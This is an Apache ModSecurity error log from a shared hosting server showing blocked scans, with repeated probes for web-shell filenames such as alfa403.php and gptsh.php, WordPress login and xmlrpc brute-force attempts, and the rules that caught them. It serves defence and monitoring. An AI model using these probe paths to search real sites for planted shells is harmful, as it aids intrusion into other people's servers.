[Tue May 26 14:43:57.095395 2026] [security2:error] [pid 636820:tid 637038] [client 20.197.193.33:55566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/wpconf.php"] [unique_id "ahVkVa_r6oOphPch7B-MfwAAAFg"]
[Tue May 26 14:43:57.095516 2026] [security2:error] [pid 636820:tid 637038] [client 20.197.193.33:55566] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/wpconf.php"] [unique_id "ahVkVa_r6oOphPch7B-MfwAAAFg"]
[Tue May 26 14:43:57.823038 2026] [security2:error] [pid 636820:tid 636936] [remote 216.73.216.30:51673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVkVa_r6oOphPch7B-MmwAAW3M"]
[Tue May 26 14:43:57.857071 2026] [security2:error] [pid 636820:tid 636977] [client 20.197.193.33:55672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/aaf.php"] [unique_id "ahVkVa_r6oOphPch7B-MnAAAABs"]
[Tue May 26 14:43:57.857213 2026] [security2:error] [pid 636820:tid 636977] [client 20.197.193.33:55672] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/aaf.php"] [unique_id "ahVkVa_r6oOphPch7B-MnAAAABs"]
[Tue May 26 14:43:58.022895 2026] [security2:error] [pid 636820:tid 636980] [client 14.173.20.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkVa_r6oOphPch7B-MlwAAAB4"]
[Tue May 26 14:43:58.390906 2026] [security2:error] [pid 636820:tid 637013] [client 20.197.193.33:55628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/wander.php"] [unique_id "ahVkVq_r6oOphPch7B-MsgAAAD8"]
[Tue May 26 14:43:58.391009 2026] [security2:error] [pid 636820:tid 637013] [client 20.197.193.33:55628] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/wander.php"] [unique_id "ahVkVq_r6oOphPch7B-MsgAAAD8"]
[Tue May 26 14:43:58.443006 2026] [security2:error] [pid 636820:tid 637064] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkVq_r6oOphPch7B-MogAAAHI"]
[Tue May 26 14:43:58.965098 2026] [security2:error] [pid 636820:tid 636961] [client 20.197.193.33:55616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/gptsh.php"] [unique_id "ahVkVq_r6oOphPch7B-MvAAAAAs"]
[Tue May 26 14:43:58.965198 2026] [security2:error] [pid 636820:tid 636961] [client 20.197.193.33:55616] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/gptsh.php"] [unique_id "ahVkVq_r6oOphPch7B-MvAAAAAs"]
[Tue May 26 14:44:00.325298 2026] [security2:error] [pid 636820:tid 636953] [client 195.178.110.34:33958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_profiler/phpinfo/info.php"] [unique_id "ahVkWK_r6oOphPch7B-M3AAAAAM"]
[Tue May 26 14:44:00.401372 2026] [security2:error] [pid 636820:tid 637003] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkV6_r6oOphPch7B-M1gAAADU"]
[Tue May 26 14:44:00.422550 2026] [security2:error] [pid 636820:tid 637009] [client 20.197.193.33:55621] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/xocx.php"] [unique_id "ahVkWK_r6oOphPch7B-M3gAAADs"]
[Tue May 26 14:44:00.422671 2026] [security2:error] [pid 636820:tid 637009] [client 20.197.193.33:55621] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/xocx.php"] [unique_id "ahVkWK_r6oOphPch7B-M3gAAADs"]
[Tue May 26 14:44:01.268052 2026] [security2:error] [pid 636820:tid 636979] [client 20.197.193.33:55649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/155.php"] [unique_id "ahVkWa_r6oOphPch7B-M8AAAAB0"]
[Tue May 26 14:44:01.268155 2026] [security2:error] [pid 636820:tid 636979] [client 20.197.193.33:55649] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/155.php"] [unique_id "ahVkWa_r6oOphPch7B-M8AAAAB0"]
[Tue May 26 14:44:01.821133 2026] [security2:error] [pid 636820:tid 637059] [client 20.197.193.33:55642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/colay.php"] [unique_id "ahVkWa_r6oOphPch7B-NBQAAAG0"]
[Tue May 26 14:44:01.821291 2026] [security2:error] [pid 636820:tid 637059] [client 20.197.193.33:55642] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/colay.php"] [unique_id "ahVkWa_r6oOphPch7B-NBQAAAG0"]
[Tue May 26 14:44:01.851293 2026] [security2:error] [pid 636820:tid 637073] [client 216.41.233.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkWa_r6oOphPch7B-NAwAAAHs"], referer: https://www.anujtradingco.com/
[Tue May 26 14:44:02.682597 2026] [security2:error] [pid 636820:tid 637003] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkWq_r6oOphPch7B-NFQAAADU"]
[Tue May 26 14:44:02.778299 2026] [security2:error] [pid 636820:tid 636967] [client 20.197.193.33:55665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/hly.php"] [unique_id "ahVkWq_r6oOphPch7B-NHwAAABE"]
[Tue May 26 14:44:02.778473 2026] [security2:error] [pid 636820:tid 636967] [client 20.197.193.33:55665] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/hly.php"] [unique_id "ahVkWq_r6oOphPch7B-NHwAAABE"]
[Tue May 26 14:44:02.965660 2026] [security2:error] [pid 636820:tid 637024] [client 109.70.100.3:48236] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVkWq_r6oOphPch7B-NDwAAAEo"]
[Tue May 26 14:44:03.321859 2026] [security2:error] [pid 636820:tid 636995] [client 20.197.193.33:55557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/ppp.php"] [unique_id "ahVkW6_r6oOphPch7B-NLgAAAC0"]
[Tue May 26 14:44:03.321957 2026] [security2:error] [pid 636820:tid 636995] [client 20.197.193.33:55557] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/ppp.php"] [unique_id "ahVkW6_r6oOphPch7B-NLgAAAC0"]
[Tue May 26 14:44:03.449912 2026] [security2:error] [pid 636820:tid 637019] [client 216.41.233.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkW6_r6oOphPch7B-NMQAAAEU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 14:44:04.504270 2026] [security2:error] [pid 636820:tid 636997] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkXK_r6oOphPch7B-NRwAAAC8"]
[Tue May 26 14:44:04.680184 2026] [security2:error] [pid 636820:tid 636984] [client 20.197.193.33:55670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/201.php"] [unique_id "ahVkXK_r6oOphPch7B-NWgAAACI"]
[Tue May 26 14:44:04.680308 2026] [security2:error] [pid 636820:tid 636984] [client 20.197.193.33:55670] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/201.php"] [unique_id "ahVkXK_r6oOphPch7B-NWgAAACI"]
[Tue May 26 14:44:05.290764 2026] [security2:error] [pid 636820:tid 637022] [client 202.141.83.254:53812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkXa_r6oOphPch7B-NbgAAAEg"]
[Tue May 26 14:44:05.291398 2026] [security2:error] [pid 636820:tid 637022] [client 202.141.83.254:53812] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkXa_r6oOphPch7B-NbgAAAEg"]
[Tue May 26 14:44:05.648639 2026] [security2:error] [pid 636820:tid 636957] [client 20.197.193.33:55679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/ops.php"] [unique_id "ahVkXa_r6oOphPch7B-NfgAAAAc"]
[Tue May 26 14:44:05.648725 2026] [security2:error] [pid 636820:tid 636957] [client 20.197.193.33:55679] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/ops.php"] [unique_id "ahVkXa_r6oOphPch7B-NfgAAAAc"]
[Tue May 26 14:44:05.991657 2026] [security2:error] [pid 636820:tid 637002] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkXa_r6oOphPch7B-NegAAADQ"]
[Tue May 26 14:44:06.528653 2026] [security2:error] [pid 636820:tid 637062] [client 20.197.193.33:55575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/samll.php"] [unique_id "ahVkXq_r6oOphPch7B-NkQAAAHA"]
[Tue May 26 14:44:06.528799 2026] [security2:error] [pid 636820:tid 637062] [client 20.197.193.33:55575] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/samll.php"] [unique_id "ahVkXq_r6oOphPch7B-NkQAAAHA"]
[Tue May 26 14:44:06.717791 2026] [security2:error] [pid 636820:tid 637003] [client 129.212.225.226:62726] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "christinaspromotions.com"] [uri "/license.txt"] [unique_id "ahVkXq_r6oOphPch7B-NmQAAADU"]
[Tue May 26 14:44:06.776444 2026] [security2:error] [pid 636820:tid 637034] [client 195.178.110.34:43058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_profiler/phpinfo/phpinfo.php"] [unique_id "ahVkXq_r6oOphPch7B-NmgAAAFQ"]
[Tue May 26 14:44:06.881832 2026] [security2:error] [pid 636820:tid 636842] [remote 31.24.44.107:60982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVkXq_r6oOphPch7B-NmAAALxU"]
[Tue May 26 14:44:07.207097 2026] [security2:error] [pid 636820:tid 637024] [client 20.197.193.33:55646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/ingfo.php"] [unique_id "ahVkX6_r6oOphPch7B-NpAAAAEo"]
[Tue May 26 14:44:07.207203 2026] [security2:error] [pid 636820:tid 637024] [client 20.197.193.33:55646] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/ingfo.php"] [unique_id "ahVkX6_r6oOphPch7B-NpAAAAEo"]
[Tue May 26 14:44:07.815934 2026] [security2:error] [pid 636820:tid 636846] [remote 132.148.72.88:39720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVkX6_r6oOphPch7B-NsQAAdhk"]
[Tue May 26 14:44:08.064274 2026] [security2:error] [pid 636820:tid 637067] [client 20.197.193.33:55561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/c55cdler.php"] [unique_id "ahVkYK_r6oOphPch7B-NwgAAAHU"]
[Tue May 26 14:44:08.064379 2026] [security2:error] [pid 636820:tid 637067] [client 20.197.193.33:55561] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/c55cdler.php"] [unique_id "ahVkYK_r6oOphPch7B-NwgAAAHU"]
[Tue May 26 14:44:08.728008 2026] [security2:error] [pid 636820:tid 637021] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkYK_r6oOphPch7B-NyAAAAEc"]
[Tue May 26 14:44:08.893583 2026] [autoindex:error] [pid 636820:tid 636970] [client 98.70.28.4:59142] AH01276: Cannot serve directory /home2/restmwhm/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:44:08.975430 2026] [security2:error] [pid 636820:tid 637020] [client 20.197.193.33:55675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/error_log.php"] [unique_id "ahVkYK_r6oOphPch7B-N4gAAAEY"]
[Tue May 26 14:44:08.975529 2026] [security2:error] [pid 636820:tid 637020] [client 20.197.193.33:55675] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/error_log.php"] [unique_id "ahVkYK_r6oOphPch7B-N4gAAAEY"]
[Tue May 26 14:44:09.617650 2026] [security2:error] [pid 636820:tid 636958] [client 20.197.193.33:55560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/xenon1337.php"] [unique_id "ahVkYa_r6oOphPch7B-N_AAAAAg"]
[Tue May 26 14:44:09.617758 2026] [security2:error] [pid 636820:tid 636958] [client 20.197.193.33:55560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/xenon1337.php"] [unique_id "ahVkYa_r6oOphPch7B-N_AAAAAg"]
[Tue May 26 14:44:10.251025 2026] [security2:error] [pid 636820:tid 636951] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkYa_r6oOphPch7B-OBAAAAAE"]
[Tue May 26 14:44:10.320852 2026] [security2:error] [pid 636820:tid 636994] [client 62.60.130.227:50617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahVkYq_r6oOphPch7B-OGgAAACw"]
[Tue May 26 14:44:10.645987 2026] [security2:error] [pid 636820:tid 637016] [client 62.60.130.227:54389] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVkYq_r6oOphPch7B-OJAAAAEI"]
[Tue May 26 14:44:10.737730 2026] [security2:error] [pid 636820:tid 637022] [client 20.197.193.33:55629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/alfa403.php"] [unique_id "ahVkYq_r6oOphPch7B-OMQAAAEg"]
[Tue May 26 14:44:10.737843 2026] [security2:error] [pid 636820:tid 637022] [client 20.197.193.33:55629] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/alfa403.php"] [unique_id "ahVkYq_r6oOphPch7B-OMQAAAEg"]
[Tue May 26 14:44:10.975377 2026] [security2:error] [pid 636820:tid 636998] [client 62.60.130.227:59444] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVkYq_r6oOphPch7B-OOgAAADA"]
[Tue May 26 14:44:11.323571 2026] [security2:error] [pid 636820:tid 637053] [client 62.60.130.227:51443] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVkY6_r6oOphPch7B-OPwAAAGc"]
[Tue May 26 14:44:11.360794 2026] [security2:error] [pid 636820:tid 637025] [client 20.197.193.33:55620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/test11.php"] [unique_id "ahVkY6_r6oOphPch7B-OQAAAAEs"]
[Tue May 26 14:44:11.360938 2026] [security2:error] [pid 636820:tid 637025] [client 20.197.193.33:55620] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/test11.php"] [unique_id "ahVkY6_r6oOphPch7B-OQAAAAEs"]
[Tue May 26 14:44:11.664940 2026] [security2:error] [pid 636820:tid 636970] [client 62.60.130.227:60975] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVkY6_r6oOphPch7B-OUQAAABQ"]
[Tue May 26 14:44:11.945400 2026] [security2:error] [pid 636820:tid 637050] [client 20.197.193.33:55674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/koala.php"] [unique_id "ahVkY6_r6oOphPch7B-OWgAAAGQ"]
[Tue May 26 14:44:11.945509 2026] [security2:error] [pid 636820:tid 637050] [client 20.197.193.33:55674] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/koala.php"] [unique_id "ahVkY6_r6oOphPch7B-OWgAAAGQ"]
[Tue May 26 14:44:11.992878 2026] [security2:error] [pid 636820:tid 637009] [client 62.60.130.227:59957] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVkY6_r6oOphPch7B-OXAAAADs"]
